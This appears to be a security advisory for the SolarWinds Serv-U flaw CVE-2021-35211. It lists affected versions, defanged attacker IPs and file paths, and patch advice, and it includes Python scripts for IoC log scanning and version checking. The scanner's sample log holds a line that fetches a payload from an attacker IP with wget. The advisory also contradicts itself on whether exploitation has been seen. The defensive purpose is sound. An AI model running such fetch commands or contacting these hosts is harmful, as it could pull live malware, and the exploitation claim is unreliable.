SolarWinds Serv-U Remote Code Execution Vulnerability (Zero-Day Exploit)


Microsoft reported that it discovered a remote code execution (RCE) vulnerability, rated with a CVSS 3.1 score of 10.0, in the SolarWinds Serv-U product. The flaw is a remote memory escape vulnerability.

SolarWinds Serv-U Remote Code Execution Vulnerability

This is a zero-day vulnerability; if exploited, a threat actor may be able to gain privileged access to the machine hosting Serv-U only. Even though no exploit for this vulnerability has been discovered, its severity/criticality makes it highly recommended that the following patches are downloaded and applied to ensure the safety of systems/assets.

Affected Systems

The following servers/systems are affected by this vulnerability:

  • SolarWinds Serv-U Managed File Transfer
  • Serv-U Secure FTP for Windows before 15.2.3 HF2

IoCs

  • 98[.]176[.]196[.]89
  • 68[.]235[.]178[.]32
  • 208[.]113[.]35[.]58
  • 144[.]34[.]179[.]162
  • 97[.]77[.]97[.]58
  • hxxp://144[.]34[.]179[.]162/a
  • C:\Windows\Temp\Serv-U.bat
  • C:\Windows\Temp\test\current.dmp
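The indicators above are published in defanged form (brackets around dots, hxxp instead of http). The following Python script, added here as an example and not part of the original advisory, refangs them and scans log lines for them; the IP matcher uses boundaries so that an IoC address does not match inside a longer, unrelated address. The sample log lines are constructed for the example.

```python
import ipaddress
import re

# IoCs exactly as listed in the advisory, in their defanged form.
DEFANGED_IOCS = [
    "98[.]176[.]196[.]89",
    "68[.]235[.]178[.]32",
    "208[.]113[.]35[.]58",
    "144[.]34[.]179[.]162",
    "97[.]77[.]97[.]58",
    "hxxp://144[.]34[.]179[.]162/a",
    r"C:\Windows\Temp\Serv-U.bat",
    r"C:\Windows\Temp\test\current.dmp",
]


def refang(ioc):
    """Convert a defanged indicator back to the literal form that appears in logs."""
    return (ioc.replace("[.]", ".")
               .replace("hxxps://", "https://")
               .replace("hxxp://", "http://"))


def classify(ioc):
    """Return 'ip', 'url' or 'path' for a refanged indicator."""
    try:
        ipaddress.ip_address(ioc)
        return "ip"
    except ValueError:
        pass
    if ioc.startswith(("http://", "https://")):
        return "url"
    return "path"


IOCS = {refang(i): classify(refang(i)) for i in DEFANGED_IOCS}


def find_iocs(line):
    """Return the indicators present in one log line, in advisory order."""
    hits = []
    for ioc, kind in IOCS.items():
        if kind == "ip":
            # No digit or dot on either side, so 98.176.196.89 does not
            # match inside 198.176.196.89 or 98.176.196.890.
            pattern = r"(?<![\d.])" + re.escape(ioc) + r"(?![\d.])"
            if re.search(pattern, line):
                hits.append(ioc)
        elif kind == "url":
            # The URL must end at a delimiter so .../a does not match .../abc.
            if re.search(re.escape(ioc) + r"(?![A-Za-z0-9_./-])", line):
                hits.append(ioc)
        else:
            # Windows paths are case-insensitive.
            if ioc.lower() in line.lower():
                hits.append(ioc)
    return hits


def scan(lines):
    """Return (line_number, [indicators]) for every line that matches at least one IoC."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = find_iocs(line)
        if hits:
            results.append((number, hits))
    return results


# Constructed sample log lines for demonstration; not taken from a real incident.
SAMPLE_LOG = [
    "2021-07-09 12:00:01 Serv-U connection from 98.176.196.89 port 443",
    "2021-07-09 12:00:02 Serv-U connection from 198.176.196.89 port 443",
    r"2021-07-09 12:00:03 Process created: cmd.exe /c C:\Windows\Temp\Serv-U.bat",
    "2021-07-09 12:00:04 powershell wget http://144.34.179.162/a",
    "2021-07-09 12:00:05 transfer completed for user alice",
    r"2021-07-09 12:00:06 File written: c:\windows\temp\test\current.dmp",
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

A line containing the download URL also reports the bare IP it embeds, which is intended: either indicator on its own is worth an alert.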

Recommended Solution(s)

Organizations are recommended to update their instances of Serv-U to the latest available version.

Product | Article | Patch
SolarWinds Serv-U Managed File Transfer | Article | Security Update
Serv-U Secure FTP for Windows before 15.2.3 HF2 | Article | Security Update
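Because the fixed release is identified by a hotfix suffix (15.2.3 HF2), a plain string comparison of version numbers gives wrong answers. The following Python helper, added here as an example and not part of the advisory, parses Serv-U version strings of the form `MAJOR.MINOR.PATCH [HFn]` and treats a missing hotfix suffix as HF0, so that 15.2.3 (no hotfix) and 15.2.3 HF1 both count as affected while 15.2.3 HF2 and later do not. The version string format is assumed from the advisory's own wording.

```python
import re

# Fixed version stated in the advisory: hotfix 2 of release 15.2.3.
FIXED_VERSION = "15.2.3 HF2"

_VERSION_RE = re.compile(r"\s*(\d+)\.(\d+)\.(\d+)(?:\s*HF\s*(\d+))?\s*", re.IGNORECASE)


def parse_version(text):
    """Parse 'MAJOR.MINOR.PATCH[ HFn]' into a comparable tuple; no HF suffix means HF0."""
    match = _VERSION_RE.fullmatch(text)
    if not match:
        raise ValueError(f"unrecognised Serv-U version string: {text!r}")
    major, minor, patch, hotfix = match.groups()
    return (int(major), int(minor), int(patch), int(hotfix or 0))


def is_vulnerable(installed):
    """True when the installed version is older than 15.2.3 HF2."""
    return parse_version(installed) < parse_version(FIXED_VERSION)


if __name__ == "__main__":
    for candidate in ["15.2.3", "15.2.3 HF1", "15.2.3 HF2", "15.2.4"]:
        status = "UPDATE REQUIRED" if is_vulnerable(candidate) else "patched"
        print(f"{candidate:12} {status}")
```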

CVE / CWE

CVE-2021-35211

Related Website(s)

* Vulnerabilities with a CVSS 3.1 score between 7.0 and 8.9 are evaluated to be “high” whereas vulnerabilities with a CVSS 3.1 score between 9.0 and 10.0 are evaluated to be “critical”.